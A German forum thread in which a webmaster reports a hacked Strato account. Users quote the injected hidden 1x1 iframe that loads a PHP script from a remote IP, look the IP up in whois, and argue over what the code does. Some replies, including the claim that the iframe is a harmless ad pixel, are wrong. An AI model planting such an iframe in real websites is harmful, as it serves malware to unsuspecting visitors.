Supportnet Computer
Planet of Tech

Supportnet / Forum / Webseiten/HTML

werde gerade gehackt





Frage

Hallo, mein strato webzugang wurde gerade gehackt und meine Websites werden verändert. Was kann ich tun bzw. wie bekomme ich den Idioten dran. strato kann angeblich nichts machen oder aufzeichnen. Hilfe hilfe

Antwort 1 von sutadur

Zunächst mal solltest Du, wenn Du die Möglichkeit noch hast, dringend Dein Zugangskennwort verändern. "Drankriegen" kannst Du denjenigen, wenn Du weißt, wer es ist. Ein erster Schritt ist herauszufinden, von welcher IP die Zugriffe erfolgt sind. Das sollte der Provider anhand der Logfiles nachvollziehen können.

Antwort 2 von Art76

Hallo,

es wurde folgender code installiert.

<iframe src='http://81.95.149.27/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Antwort 3 von FirstAid

Hey,

also erstmal würde ich schnellsten die passwörter ändern, auf denen deine webseite liegt. Falls du nicht rankommst musst du dich mit strato in verbindung setzten und dir neue zugansdaten holen.
Das aber nachträglich zu erkennen wär das war.. wird schwierig...
Es könnte nur sein, das strato die ip speichert, die sich angemeldet hat..falls du diese bekommst, kannst du sie ja umwandeln und somt den Provider ermitteln...naja aber dann halt zur Polizei...wenn das ganze über n Proxy lief wirds natürlich noch unwahrscheinlicher die zu finden...
Also änder deine Passwörter so, dass sie zahlen, buchstaben (groß klein) sowie sonderzeichen beinhalten...

mfg

Antwort 4 von moktar

Dieser Rechner hat die angegebene IP



inetnum: 81.95.148.0 - 81.95.151.255
netname: RBNET
descr: RBusiness Network
country: PA
admin-c: RNR4-RIPE
tech-c: RNR4-RIPE
status: ASSIGNED PA
mnt-by: RBN-MNT
source: RIPE # Filtered

role: RBusiness Network Registry
address: RBusiness Network
address: The Century Tower Building
address: Ricardo J. Alfari Avenue
address: Panama City
address: Republic of Panama
phone: +1 401 369 8152
remarks: Points of contact for RBusiness Network
Operations
remarks: ------------------------------------------------------
remarks: Routing and peering issues: noc@rbnnetwork.com
remarks: SPAM and Network security issues: abuse@rbnnetwork.com
remarks: Customer support: support@rbnnetwork.com
remarks: General information: info@rbnnetwork.com
remarks: ------------------------------------------------------
e-mail: noc@rbnnetwork.com
admin-c: JK4668-RIPE
tech-c: JI424-RIPE
nic-hdl: RNR4-RIPE
mnt-by: RBN-MNT
source: RIPE # Filtered

% Information related to '81.95.148.0/22AS40989'

route: 81.95.148.0/22
descr: RBNetwork
origin: AS40989
mnt-by: RBN-MNT
source: RIPE # Filtered




Der Whois-Dienst liefert Informationen über die Inhaber von IP-Adressen und Domain-Namen

Antwort 5 von Art76

Danke,

hat einer ne ahnung was der code macht???


MFG

Antwort 6 von moktar

schmeiss ihn einfach raus

Antwort 7 von Friedel

Einen Ähnlichen Angriff gab es vor kurzem auch auf mehrere Server von Hostloco. Dort wurde so ein Iframe in zig Tausend Webseiten eingebaut. Die IP nützt dir wahrscheinlich recht wenig, wenn es bei einem einmaligen Angriff bleibt. Die IP der verlinkten Site nützt dir gar nichts. Die Angreifer sind meist nichtsahnende PC-Nutzer, denen ein Trojaner untergeschoben wurde. Narülich könntest du gegen den Verursacher vorgehen, aber wie willst du erausfinden wer den Leuten den Trojaner untergejubelt hat? Der PC-User mit dem Trojaner ist zwar auch verantwortlich, aber wenn du gegen ihn vorgehst, wird er bestraft ohne dass du einen Nutzen davon hast. Er wird dir bestimmt keinen Schadenersatz leisten müssen.

Dass Strato da nichts machen kann, ist zwar möglich, aber nicht richtig. Wenn du bei Strato einen Hostingvertrag hast, ist Strato dafür verantwortlich solche Angriffe zu verhindern bzw. ab zu wehren. Das mindeste was sie machen sollten, ist ein Backup von vor dem Angriff einspielen. Wenn du dort einen Server hast, ist es allerding deine Aufgabe sowas ab zu wehren.

Antwort 8 von Bugsbunny

Was labert ihr hier? Die auf deiner Seite eingefügte Zeile hat dir ein unsichtbares 1 Pixel großes Bild eingebaut welches auf den Server 81.95.149.27 verweist. Sowas haben fast alle Webseiten eingebaut auf denen Reklame zu sehen ist. Das hat also nichts mit deinem Passwort zu tun. Man nennt diese unsichtbaren Pixel auch Webbugs womit normalerweise Klicks gezählt werden oder hinter den Internetnutzer hinterher geschnüffelt wird. Das eizig bedenkliche ist, dass der Server in Panama-City steht. ich vermute mal du hast ein oder mehrere Werbebanner auf deiner Seite. Vielleicht will man von Panama-City aus über deine IP bei Strato Spam verteilen. lol

Bugsbunny (der keine Ahnung von html oder php hat)

Antwort 9 von conny77

Dazu gibt es z..B. hier und hier
nähere Infos.

Antwort 10 von Friedel

@Bugsbunny: Was laberst du da? Außer in deiner Antwort kommt in diesem Thread kein Bild mit 1x1Pixel vor. Und wenn man Werbebanner in eine Seite einbaut, entstehen dadurch sicher keine Iframes. Dass fast alle Webseiten sowas eingabaut haben ist auch blanker Unsinn. Und ob jemand von Panama aus Spam verteilen will hat genau wie das Thema dieses Threads nichts mit seiner IP zu tun.

Antwort 11 von rabies

Zitat:
Und wenn man Werbebanner in eine Seite einbaut, entstehen dadurch sicher keine Iframes.


Nein? Bei AdSense ist's so... Kooomisch. kwT & scnr.

--rabies.

Antwort 12 von mr.checker

Ich weiß ja nicht wirklich, wie das jetzt Funktioniert hat, aber wenn ich die Adresse des Iframes aufrufe, bekomme ich lt. Virenscanner einen Virus verpasst.

Antwort 13 von Friedel

Das ist kein Virus sondern ein Trojaner.

Durch AdSensewerbung entstehen keine Iframes. Hier im Supportnet und auch auf einigen von meinen Websites ist AdSensewerbung. Wie du sehen kannst, ohne Iframes. Außerdem Hat AdSense nichts damit zu tun, dass man Werbebanner einbaut. Dabei wird ein Bereich in die Website eingebaut, deren Inhalt komplett von Google gestaltet wird. Man kann den Inhalt zwar beeinflussen, aber er kommt von Google.

Antwort 14 von Bugsbunny

@Friedel

>Außer in deiner Antwort kommt in diesem Thread kein Bild mit 1x1Pixel vor. <

Soo? Und was ist das: <iframe src='http://81.95.149.27/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Das ist ein Bild mit einer Höhe von einem Pixel und einer Breite von einem Pixel welches versteckt wurde. Beim Aufruf der Seite wird die IP desjenigen der die Seite aufgerufen hat an den Server 81.95.149.17 gesendet.

>Dass fast alle Webseiten sowas eingabaut haben ist auch blanker Unsinn.<

Dann leere doch mal den Cache deines Browsers und gehe doch mal auf z.B. pcwelt.de (am besten mit dem IE in den Grundeinstellungen, ohne ad-Blocker, Webwasher, etc.). Danach durchsuche mal deinen Cache wieder und lass dir alle darin enthaltenen Bilder anzeigen.
Oder überprüfe doch mal mit netstat (ebenfalls ohne ad-Blocker, Webwasher etc.) beim Aufruf irgend einer Seite mit welchen Servern du vebunden wirst. Dann wirst du feststellen, dass du auch noch mit anderen Servern als den von der pcwelt.de verbunden bist. Unteranderem auch mit mindestens einem ad-Server der deine IP mit der Hilfe eines 1x1 großen unsichtbaren Bildes beim Aufruf der Seite mal so ganz nebenbei protokolliert hat.

Dass Art76 sich letztendlich selbst gehackt hat, weil er einen Trojaner auf dem Rechner hatte, setzt der ganzen Sache noch die Krone auf und ändert nichts an der Sache selbst. Was man in Panama mit der IP vorhat, werden die uns bestimmt nicht verraten.

Aber schön von dir, dass du wenigstens, bevor du mich direkt "angesprochen" hast wenigsten die die Links von Conny77 bemerkt hast und die entsprechenden Postings auch durchgelesen hast.

Viel Spass noch!

Antwort 15 von rfb

Zitat:
<iframe src='http://81.95.149.27/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Das ist ein Bild mit einer Höhe von einem Pixel und einer Breite von einem Pixel welches versteckt wurde.
nein, das ist ein IFrame in der genannten Größe, dieser widerum lädt direkt ein PHP-Script nach.
Ein Bild ist dabei nicht im Spiel, es sei denn im PHP-Script taucht eins auf. Aber wenn eh schon ein PHP-Script genutzt wird, wäre es ziemlich dämlich damit ein Bild aufzurufen, dessen Aufruf widerum ein PHP-Script in Aktion bringt.

Antwort 16 von Bugsbunny

>nein, das ist ein IFrame in der genannten Größe

Man lernt im Leben nie aus. Ich hatte es als Bild bezeichnet weil ich von html und php keine Ahnung habe und absoluter Leie bin (ich schrieb es bereits) Ich jedenfalls blocke diesen 1x1 großen Mist schon seit langem und es ist mir egal ob es als Iframe oder Bild bezeichnet wird.

Viel Sass noch bei Surfen!

Antwort 17 von rabies

Zitat:
Durch AdSensewerbung entstehen keine Iframes. Hier im Supportnet und auch auf einigen von meinen Websites ist AdSensewerbung. Wie du sehen kannst, ohne Iframes. Außerdem Hat AdSense nichts damit zu tun, dass man Werbebanner einbaut. Dabei wird ein Bereich in die Website eingebaut, deren Inhalt komplett von Google gestaltet wird. Man kann den Inhalt zwar beeinflussen, aber er kommt von Google.


Das ist imho Müll. Sofern Du Firefox benutzt, klick doch bitte, einmal mit der rechten Maustaste auf eine AdSense-Werbung. :-) Huch, auf einmal taucht im Kontextmenü 'Aktueller Frame' auf. Aber, natürlich, nein, das ist kein inline Frame, der da durch das JavaScript von Google generiert wird.